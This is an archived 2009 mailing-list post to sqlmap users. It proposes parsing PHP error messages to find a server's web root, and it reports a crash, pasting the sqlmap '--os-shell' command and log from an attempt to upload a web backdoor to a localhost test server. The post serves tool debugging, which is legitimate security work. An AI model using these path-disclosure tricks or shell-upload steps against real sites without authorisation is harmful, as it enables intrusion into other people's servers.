[sqlmap-users] A bug and a sugestion
Brought to you by:
inquisb
From: Stuffe <stu...@gm...> - 2009-07-29 16:22:37
|
I just fired up the version of sqlmap, but it couldnt find the web root, although it should be simple to do. A simple regex could identify all php errors, they all start like <b>Parse error</b>:, <b>Notice</n>:, <b>Warning</b>:, <b>Fatal error</b>: etc, After that comes some random crap and then comes the url you are looking for, inside a <b> tag, eg. <b>C:\wamp\www\index.php</b>. Here are some examples: <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line <b>12</b> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>C:\wamp\www\index.php</b> on line <b>14</b> <b>Parse error</b>: parse error, expecting `'('' in <b>C:\wamp\www\index.php </b> on line <b>28</b> As you can see, they are not hard to extract with a regex. And they can often be generated, if you insert something that brakes the sql query or by typecasting the a get var as an array (like index.php?a[]=now_a_becomes_an_array) or other tricks. Any way, when the error message is found, it should be checked wheather or not the last part of the url is equal to the last part of the internal path, if they are equal, you know the webroot. eg. http://example.com/whatever/index.php gives the error: <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\whatever\index.php</b>on line <b>12</b> you replace \ with / and compare: http://example.com/whatever/index.php with C:/wamp/www/whatever/index.php and see find that C:/wamp/www/ must be the webroot. Now i dont know if or how sqlmap is trying to retrieve the webroot, but it wasnt able to find these things in my tests (even though they were all over the place). Any way, It also crashed on me when I tried to upload a webshell: C:\Documents and Settings\Administrator>"C:\Documents and Settings\Administrator \Desktop\sqlmap-0.7_exe\sqlmap.exe" -u http://localhost/?a=1 --os-shell sqlmap/0.7 by Bernardo Damele A. G. <ber...@gm...> [*] starting at: 17:37:18 [17:37:18] [INFO] testing connection to the target url [17:37:18] [INFO] testing if the url is stable, wait a few seconds [17:37:19] [INFO] url is stable [17:37:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [17:37:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [17:37:20] [INFO] testing if GET parameter 'a' is dynamic [17:37:20] [INFO] confirming that GET parameter 'a' is dynamic [17:37:20] [INFO] GET parameter 'a' is dynamic [17:37:20] [INFO] testing sql injection on GET parameter 'a' with 0 parenthesis [17:37:20] [INFO] testing unescaped numeric injection on GET parameter 'a' [17:37:20] [INFO] confirming unescaped numeric injection on GET parameter 'a' [17:37:20] [INFO] GET parameter 'a' is unescaped numeric injectable with 0 paren thesis [17:37:20] [INFO] testing for parenthesis on injectable parameter [17:37:20] [INFO] the injectable parameter requires 0 parenthesis [17:37:20] [INFO] testing MySQL [17:37:20] [INFO] confirming MySQL [17:37:20] [INFO] retrieved: 9 [17:37:20] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.0.63, PHP 5.2.9 back-end DBMS: MySQL >= 5.0.0 [17:37:20] [INFO] testing stacked queries support on parameter 'a' [17:37:20] [INFO] detecting back-end DBMS version from its banner [17:37:20] [INFO] retrieved: 5.1.33 [17:37:20] [WARNING] the web application does not support stacked queries on par ameter 'a' [17:37:20] [INFO] going to upload a web page backdoor for command execution [17:37:20] [INFO] fingerprinting the back-end DBMS operating system [17:37:20] [INFO] retrieved: c [17:37:20] [INFO] the back-end DBMS operating system is Windows [17:37:20] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/Inetpub/wwwroot/]: C:/wamp/www/ [17:37:46] [INFO] retrieved web server full paths: 'C:\wamp\www, C:\' please provide any additional web server full path to try to upload the agent [C :/Inetpub/wwwroot/test/]: C:/wamp/www/test/ [17:37:51] [INFO] trying to upload the uploader agent which web application language does the web server support? [1] ASP [2] PHP (default) [3] JSP > 2 [17:37:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the command li ne and the following text and send by e-mail to sql...@li...urceforge.n et. The developer will fix it as soon as possible: sqlmap version: 0.7 Python version: 2.6.1 Operating system: win32 Traceback (most recent call last): File "sqlmap.py", line 84, in main File "lib\controller\controller.pyc", line 263, in start File "lib\controller\action.pyc", line 140, in action File "plugins\generic\takeover.pyc", line 295, in osShell File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit File "lib\request\connect.pyc", line 131, in getPage File "urllib2.pyc", line 124, in urlopen File "urllib2.pyc", line 383, in open File "urllib2.pyc", line 401, in _open File "urllib2.pyc", line 361, in _call_chain File "urllib2.pyc", line 1130, in http_open File "urllib2.pyc", line 1087, in do_open File "httplib.pyc", line 656, in __init__ File "httplib.pyc", line 668, in _set_hostport InvalidURL: nonnumeric port: '80\test' [*] shutting down at: 17:37:53 |